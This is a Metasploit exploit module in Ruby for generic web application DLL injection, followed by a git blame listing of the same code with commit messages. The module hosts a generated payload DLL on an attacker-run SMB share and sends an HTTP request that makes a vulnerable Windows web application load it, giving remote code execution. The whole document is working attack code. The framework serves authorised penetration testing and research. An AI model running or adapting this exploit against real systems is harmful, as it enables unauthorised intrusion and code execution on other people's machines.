metasploit-framework/modules/exploits/windows/http/generic_http_dll_injection.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Generic Web Application DLL Injection',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where a HTTP request
        triggers a DLL load from an specified SMB share. This module serves payloads as
        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
        trigger the load of the DLL.
      },
      'Author'         =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'Platform'       => 'win',
      'Privileged'     => false,
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          ['CWE', '427']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
      'DisclosureDate' => 'Mar 04 2015'
      ))

      register_options(
        [
          OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
          OptString.new('TARGETURI', [true,  'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
        ], self.class)

      deregister_options('FILE_CONTENTS')
  end

  def setup
    super

    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    print_status("File available on #{unc}...")
  end

  def primer
    sploit = target_uri.to_s
    sploit << unc

    print_status("#{peer} - Trying to ")
    send_request_raw({
      'method' => 'GET',
      'uri' => sploit
    }, 3)
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`##`
Clean module 2015-03-04 22:18:10 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Clean module 2015-03-04 22:18:10 +00:00			`Rank = ManualRanking`

Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`include Msf::Exploit::Remote::HttpClient`
Modify SMB generation code to use primer based on #3074 changes to implement Msf::Exploit::Remote::SMB::Server::Share as a mixin. 2015-02-20 11:31:15 +00:00			`include Msf::Exploit::Remote::SMB::Server::Share`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`include Msf::Exploit::EXE`

			`def initialize(info={})`
			`super(update_info(info,`
Clean module 2015-03-04 22:18:10 +00:00			`'Name' => 'Generic Web Application DLL Injection',`
			`'Description' => %q{`
			`This is a general-purpose module for exploiting conditions where a HTTP request`
Update description 2015-03-04 22:39:27 +00:00			`triggers a DLL load from an specified SMB share. This module serves payloads as`
Clean module 2015-03-04 22:18:10 +00:00			`DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would`
			`trigger the load of the DLL.`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`},`
Clean module 2015-03-04 22:18:10 +00:00			`'Author' =>`
			`[`
			`'Matthew Hall <hallm[at]sec-1.com>'`
			`],`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`'Platform' => 'win',`
Clean module 2015-03-04 22:18:10 +00:00			`'Privileged' => false,`
			`'Arch' => [ARCH_X86, ARCH_X86_64],`
			`'Stance' => Msf::Exploit::Stance::Aggressive,`
Do code cleanup 2015-03-04 22:37:31 +00:00			`'Payload' =>`
			`{`
			`'Space' => 2048,`
			`'DisableNops' => true`
			`},`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`'References' =>`
			`[`
Clean module 2015-03-04 22:18:10 +00:00			`['CWE', '427']`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Windows x86', { 'Arch' => ARCH_X86 } ],`
			`[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]`
			`],`
			`'DefaultTarget' => 0, # Default target is 32-bit as we usually inject into 32bit processes`
Clean module 2015-03-04 22:18:10 +00:00			`'DisclosureDate' => 'Mar 04 2015'`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`))`
Clean module 2015-03-04 22:18:10 +00:00
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`register_options(`
			`[`
Clean module 2015-03-04 22:18:10 +00:00			`OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),`
			`OptString.new('TARGETURI', [true, 'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),`
			`OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`], self.class)`
Clean module 2015-03-04 22:18:10 +00:00
Modify SMB generation code to use primer based on #3074 changes to implement Msf::Exploit::Remote::SMB::Server::Share as a mixin. 2015-02-20 11:31:15 +00:00			`deregister_options('FILE_CONTENTS')`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`end`

Clean module 2015-03-04 22:18:10 +00:00			`def setup`
			`super`

Modify primer to utilise file_contents macro. 2015-03-04 09:51:32 +00:00			`self.file_contents = generate_payload_dll`
Clean module 2015-03-04 22:18:10 +00:00			`self.file_name = datastore['FILE_NAME'] \|\| "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"`
Modify SMB generation code to use primer based on #3074 changes to implement Msf::Exploit::Remote::SMB::Server::Share as a mixin. 2015-02-20 11:31:15 +00:00			`print_status("File available on #{unc}...")`
Clean module 2015-03-04 22:18:10 +00:00			`end`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00
Clean module 2015-03-04 22:18:10 +00:00			`def primer`
			`sploit = target_uri.to_s`
			`sploit << unc`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00
Clean module 2015-03-04 22:18:10 +00:00			`print_status("#{peer} - Trying to ")`
			`send_request_raw({`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`'method' => 'GET',`
			`'uri' => sploit`
Clean module 2015-03-04 22:18:10 +00:00			`}, 3)`
			`end`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00
Clean module 2015-03-04 22:18:10 +00:00			`def exploit`
			`begin`
			`Timeout.timeout(datastore['SMB_DELAY']) {super}`
			`rescue Timeout::Error`
			`# do nothing... just finish exploit and stop smb server...`
Add timeout to connection handler 2014-12-22 12:33:27 +00:00			`end`
Generic HTTP DLL Injection Exploit Module This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module to perform arbitrary DLL injection over SMB. 2014-03-07 15:09:45 +00:00			`end`
			`end`